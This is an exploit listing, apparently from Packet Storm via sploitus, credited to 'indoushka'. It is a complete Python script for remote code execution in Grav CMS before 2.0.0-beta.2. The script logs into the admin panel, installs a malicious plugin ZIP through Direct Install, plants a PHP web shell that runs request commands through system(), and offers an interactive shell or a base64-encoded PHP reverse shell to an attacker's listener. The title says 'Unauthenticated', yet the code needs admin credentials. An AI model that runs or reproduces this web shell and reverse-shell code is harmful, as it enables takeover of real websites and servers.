Share
## https://sploitus.com/exploit?id=PACKETSTORM:223728
==================================================================================================================================
| # Title : Grav CMS < 2.0.0-beta.2 Unauthenticated Plugin Installation leading to RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://getgrav.org/ |
==================================================================================================================================
[+] Summary : This Python exploit targets a vulnerability in Grav CMS versions prior to 2.0.0-beta.2, abusing the Admin βDirect Installβ plugin feature to achieve remote code execution.
[+] POC :
#!/usr/bin/env python3
import argparse
import base64
import json
import os
import sys
import time
import zipfile
import tempfile
import re
import requests
from urllib.parse import urljoin
from bs4 import BeautifulSoup
class GravRCE:
def __init__(self, target_url, username, password, verbose=False, timeout=30):
self.base_url = target_url.rstrip('/')
self.username = username
self.password = password
self.verbose = verbose
self.timeout = timeout
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})
self.csrf_token = None
self.authenticated = False
def log(self, msg, level="INFO"):
colors = {
"SUCCESS": "\033[92m[+]\033[0m",
"ERROR": "\033[91m[-]\033[0m",
"WARNING": "\033[93m[!]\033[0m",
"INFO": "\033[96m[*]\033[0m",
"PROC": "\033[94m[@]\033[0m"
}
print(f"{colors.get(level, '[*]')} {msg}")
def get_csrf_token(self):
"""Extract CSRF token from login page"""
login_url = urljoin(self.base_url, '/admin/login')
self.log(f"Fetching CSRF token from {login_url}", "PROC")
try:
response = self.session.get(login_url, timeout=self.timeout)
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
for name in ['admin-nonce', 'csrf', '__csrf', 'nonce']:
token_input = soup.find('input', {'name': name})
if token_input:
self.csrf_token = token_input.get('value')
self.log(f"CSRF token found: {self.csrf_token}", "SUCCESS")
return True
meta_tag = soup.find('meta', {'name': 'csrf-token'})
if meta_tag:
self.csrf_token = meta_tag.get('content')
self.log(f"CSRF token found: {self.csrf_token}", "SUCCESS")
return True
self.log("Could not find CSRF token", "ERROR")
return False
except Exception as e:
self.log(f"Error fetching CSRF token: {e}", "ERROR")
return False
def authenticate(self):
"""Authenticate to Grav Admin panel"""
login_url = urljoin(self.base_url, '/admin/login')
self.log(f"Authenticating as {self.username}...", "PROC")
data = {
'username': self.username,
'password': self.password,
'admin-nonce': self.csrf_token,
'task': 'login',
'login': 'Login'
}
try:
response = self.session.post(login_url, data=data, timeout=self.timeout)
if response.status_code == 302 or response.status_code == 200:
if 'dashboard' in response.text.lower() or 'grav' in response.text.lower():
self.authenticated = True
self.log("Authentication successful", "SUCCESS")
return True
elif 'invalid' in response.text.lower():
self.log("Invalid credentials", "ERROR")
return False
self.log(f"Authentication failed: HTTP {response.status_code}", "ERROR")
return False
except Exception as e:
self.log(f"Authentication error: {e}", "ERROR")
return False
def create_malicious_plugin(self, plugin_name, shell_filename):
"""Create malicious plugin ZIP file"""
self.log(f"Creating malicious plugin: {plugin_name}", "PROC")
temp_dir = tempfile.mkdtemp()
plugin_dir = os.path.join(temp_dir, plugin_name)
os.makedirs(plugin_dir)
plugin_php = f'''<?php
namespace Grav\\Plugin;
use Grav\\Common\\Plugin;
class {plugin_name.capitalize()}Plugin extends Plugin {{
public static function getSubscribedEvents(): array {{
return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
}}
public function onPluginsInitialized(): void {{
$shell_path = GRAV_ROOT . '/{shell_filename}';
if (!file_exists($shell_path)) {{
$shell_content = '<?php if(isset($_REQUEST["cmd"])){{ echo "<pre>"; system($_REQUEST["cmd"]); echo "</pre>"; }} ?>';
file_put_contents($shell_path, $shell_content);
}}
}}
}}
?>
'''
blueprints = f'''name: {plugin_name.capitalize()}
version: 1.0.0
description: "Plugin installed via direct install"
author:
name: Grav
homepage: https://getgrav.org
license: MIT
form:
validation: loose
fields:
enabled:
type: toggle
label: Plugin status
highlight: 1
default: 1
options:
1: Enabled
0: Disabled
validate:
type: bool
'''
plugin_yaml = 'enabled: true\n'
with open(os.path.join(plugin_dir, f"{plugin_name}.php"), 'w') as f:
f.write(plugin_php)
with open(os.path.join(plugin_dir, "blueprints.yaml"), 'w') as f:
f.write(blueprints)
with open(os.path.join(plugin_dir, f"{plugin_name}.yaml"), 'w') as f:
f.write(plugin_yaml)
zip_path = os.path.join(temp_dir, f"{plugin_name}.zip")
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
for root, dirs, files in os.walk(plugin_dir):
for file in files:
file_path = os.path.join(root, file)
arcname = os.path.relpath(file_path, temp_dir)
zipf.write(file_path, arcname)
with open(zip_path, 'rb') as f:
zip_data = f.read()
import shutil
shutil.rmtree(temp_dir)
self.log(f"Plugin created: {len(zip_data)} bytes", "SUCCESS")
return zip_data
def get_admin_nonce(self):
"""Extract admin nonce from direct-install page"""
direct_install_url = urljoin(self.base_url, '/admin/tools/direct-install')
self.log("Fetching admin nonce...", "PROC")
try:
response = self.session.get(direct_install_url, timeout=self.timeout)
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
nonce_input = soup.find('input', {'name': 'admin-nonce'})
if nonce_input:
admin_nonce = nonce_input.get('value')
self.log(f"Admin nonce obtained: {admin_nonce}", "SUCCESS")
return admin_nonce
self.log("Could not find admin nonce", "ERROR")
return None
except Exception as e:
self.log(f"Error fetching admin nonce: {e}", "ERROR")
return None
def upload_plugin(self, zip_data, plugin_name):
"""Upload plugin via Direct Install"""
direct_install_url = urljoin(self.base_url, '/admin/tools/direct-install')
self.log(f"Uploading plugin to {direct_install_url}", "PROC")
admin_nonce = self.get_admin_nonce()
if not admin_nonce:
return False
files = {
'admin-nonce': (None, admin_nonce),
'data[file]': (f'{plugin_name}.zip', zip_data, 'application/zip'),
'task': (None, 'direct-install')
}
try:
response = self.session.post(direct_install_url, files=files, timeout=self.timeout)
if response.status_code == 302 or response.status_code == 200:
if 'success' in response.text.lower() or 'installed' in response.text.lower():
self.log("Plugin uploaded and installed successfully!", "SUCCESS")
return True
elif 'error' in response.text.lower():
self.log(f"Installation error: {response.text[:200]}", "ERROR")
return False
self.log(f"Upload failed: HTTP {response.status_code}", "ERROR")
return False
except Exception as e:
self.log(f"Upload error: {e}", "ERROR")
return False
def trigger_plugin(self):
"""Trigger plugin by accessing main page"""
self.log("Triggering plugin to deploy webshell...", "PROC")
try:
response = self.session.get(self.base_url, timeout=self.timeout)
if response.status_code == 200:
self.log("Plugin triggered successfully", "SUCCESS")
return True
return False
except Exception as e:
self.log(f"Error triggering plugin: {e}", "ERROR")
return False
def check_webshell(self, shell_filename):
"""Verify webshell deployment"""
shell_url = urljoin(self.base_url, shell_filename)
self.log(f"Checking webshell at {shell_url}", "PROC")
test_cmd = "echo WEBSHELL_TEST"
try:
response = self.session.get(shell_url, params={'cmd': test_cmd}, timeout=self.timeout)
if response.status_code == 200 and 'WEBSHELL_TEST' in response.text:
self.log("Webshell is accessible!", "SUCCESS")
return shell_url
return None
except Exception as e:
self.log(f"Webshell check failed: {e}", "ERROR")
return None
def execute_command(self, shell_url, cmd):
"""Execute command via webshell"""
try:
response = self.session.get(shell_url, params={'cmd': cmd}, timeout=self.timeout)
if response.status_code == 200:
output = response.text
output = re.sub(r'<pre>', '', output)
output = re.sub(r'</pre>', '', output)
return output.strip()
return None
except Exception as e:
self.log(f"Command execution error: {e}", "ERROR")
return None
def deploy_reverse_shell(self, shell_url, lhost, lport):
"""Deploy reverse shell payload"""
self.log(f"Deploying reverse shell to {lhost}:{lport}...", "PROC")
rev_shell = f'''<?php
$sock = fsockopen("{lhost}", {lport});
if ($sock) {{
exec("/bin/sh -i <&3 >&3 2>&3", $output);
fwrite($sock, implode("\\n", $output));
fclose($sock);
}}
?>'''
b64_shell = base64.b64encode(rev_shell.encode()).decode()
deploy_cmd = f"echo '{b64_shell}' | base64 -d > /tmp/revshell.php && php /tmp/revshell.php"
self.execute_command(shell_url, deploy_cmd)
self.log("Reverse shell payload sent. Check your listener!", "SUCCESS")
def run(self, shell_filename=None, lhost=None, lport=None, command=None):
"""Main exploit routine"""
self.log(f"Target: {self.base_url}")
if not self.get_csrf_token():
self.log("Failed to get CSRF token", "ERROR")
return False
if not self.authenticate():
self.log("Authentication failed", "ERROR")
return False
plugin_name = "shellplugin_" + str(int(time.time()))
if not shell_filename:
shell_filename = f"shell_{int(time.time())}.php"
zip_data = self.create_malicious_plugin(plugin_name, shell_filename)
if not self.upload_plugin(zip_data, plugin_name):
self.log("Plugin upload failed", "ERROR")
return False
if not self.trigger_plugin():
self.log("Failed to trigger plugin", "WARNING")
shell_url = self.check_webshell(shell_filename)
if not shell_url:
self.log("Webshell not found. Exploit may have failed.", "ERROR")
return False
if command:
self.log(f"Executing command: {command}")
output = self.execute_command(shell_url, command)
if output:
print("\n" + "=" * 60)
print(output)
print("=" * 60)
elif lhost and lport:
self.deploy_reverse_shell(shell_url, lhost, lport)
else:
self.log("Interactive shell mode. Type 'exit' to quit.", "SUCCESS")
print("\n" + "=" * 60)
print("Webshell available at:", shell_url)
print("Commands will be executed on the target.")
print("=" * 60 + "\n")
while True:
try:
cmd = input("\033[92mshell>\033[0m ").strip()
if cmd.lower() in ['exit', 'quit']:
break
if cmd:
output = self.execute_command(shell_url, cmd)
if output:
print(output)
except KeyboardInterrupt:
print("\nExiting...")
break
return True
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-42607 - Grav CMS Remote Code Execution",
epilog="""
Examples:
python3 exploit.py -t http://localhost/grav -u admin -p admin123
python3 exploit.py -t http://localhost/grav -u admin -p admin123 -c "id"
python3 exploit.py -t http://localhost/grav -u admin -p admin123 --reverse-shell --lhost 10.0.0.5 --lport 4444
python3 exploit.py -t http://localhost/grav -u admin -p admin123 --interactive
"""
)
parser.add_argument("-t", "--target", required=True, help="Target Grav CMS URL")
parser.add_argument("-u", "--username", required=True, help="Grav Admin username")
parser.add_argument("-p", "--password", required=True, help="Grav Admin password")
parser.add_argument("-c", "--command", help="Command to execute")
parser.add_argument("--reverse-shell", action="store_true", help="Deploy reverse shell")
parser.add_argument("--lhost", help="Listener host for reverse shell")
parser.add_argument("--lport", type=int, help="Listener port for reverse shell")
parser.add_argument("--interactive", action="store_true", help="Interactive shell mode")
parser.add_argument("--shell-file", help="Webshell filename (default: auto-generated)")
parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
parser.add_argument("--timeout", type=int, default=30, help="Request timeout (seconds)")
args = parser.parse_args()
print("""
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CVE-2026-42607 - Grav CMS Remote Code Execution β
β Unauthenticated Plugin Installation leading to RCE β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
""")
exploit = GravRCE(
target_url=args.target,
username=args.username,
password=args.password,
verbose=args.verbose,
timeout=args.timeout
)
if args.reverse_shell:
if not args.lhost or not args.lport:
print("[-] --reverse-shell requires --lhost and --lport")
sys.exit(1)
success = exploit.run(
shell_filename=args.shell_file,
lhost=args.lhost,
lport=args.lport
)
elif args.interactive or args.command:
success = exploit.run(
shell_filename=args.shell_file,
command=args.command
)
else:
success = exploit.run(shell_filename=args.shell_file)
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================